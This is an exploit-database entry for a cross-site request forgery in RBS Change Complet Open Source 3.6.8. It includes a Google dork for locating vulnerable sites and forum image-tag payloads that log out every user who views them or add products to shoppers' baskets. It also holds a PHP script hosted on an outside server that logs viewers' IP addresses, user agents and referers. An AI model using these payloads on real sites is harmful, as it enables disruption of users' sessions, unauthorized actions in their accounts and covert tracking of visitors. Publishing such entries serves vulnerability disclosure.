RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery

Author: Krusty Hack
type: webapps
platform: php
port: 80.0
date_added: 2014-10-02 
date_updated: 2014-10-02 
verified: 0 
codes: OSVDB-112649 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcmsecomos-3.6.8.zip

# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux

HOW TO
======

Just add [img="http://CSRF"][/img] on forum signature or forum posts.

TEST
====

Based on demo.rbschange.fr:
---------------------------

[img="http://server/fr/deconnexion/"][/img]

Will disconnect all users who load the image.

Other example:
--------------

[img="http://www.example.com/log.php"][/img]

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];

file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip -  $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);

?>

To get users ip, user agent, ...


DESCRIPTION
===========

Add a product to a customer basket with an image tag and without any verification.

HOW TO
======

Just add [img="/action/order/AddToCart?shopId=13159&productId=13312"][/img] on forum signature or forum posts.